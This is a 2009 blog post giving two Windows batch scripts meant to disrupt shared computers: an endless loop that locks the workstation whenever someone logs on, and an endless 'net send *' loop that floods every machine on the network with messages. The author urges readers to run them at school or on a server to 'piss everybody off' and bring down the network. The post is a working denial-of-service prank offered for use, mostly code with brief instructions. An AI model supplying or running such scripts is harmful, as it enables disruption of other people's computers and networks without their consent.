Subscribe:     Subscribe by Email  Subscribe by Twitter  Subscribe by Facebook

How to Make Really Annoying Programs

This is how to make some VERY annoying batch programs that you can use almost any where i.e school.

Follow the steps below carefully to make your program.

Ok, open notepad and add this code:

@ECHO OFF
:START
rundll32 user32.dll,LockWorkStation
GOTO :START

Then save as whatever.bat

This one locks the work station, and as soon as somebody trys to log back on, it logs them back off again in about half a second, try to get this running on a server, only way to stop it is to restart, and if the server has to restart, then that ****s the network for a bit :devil:

—————————————————————————————

And this one has to one of the most annoying batch files to run on a network, add this code to a batch file:

@ECHO OFF
:START
net send *
GOTO :START

Again save as whatever.bat

This program sends a message of your choice to EVERY computer on the network that is running the messenger service, NT and XP usually always have this running, so again run it at school and piss everybody off.
Or you could combine to two programs so that they cannot even log back on to stop it from sending thousands of messages lol. play around, have fun.

Also if you want to stop the messenger service from running so you dont receive the messages no more do this:

Start > Run > services.msc

Find the messenger service and stop it from running.

If you enjoyed this post, you might want to subscribe our RSS feed or become our Facebook fan! You will get all the latest updates at both the places.

Related Posts

Comments

blog comments powered by Disqus

© 2009 Sizzled Core. All Rights Reserved.

Content licensed under Creative Commons.  |  page counter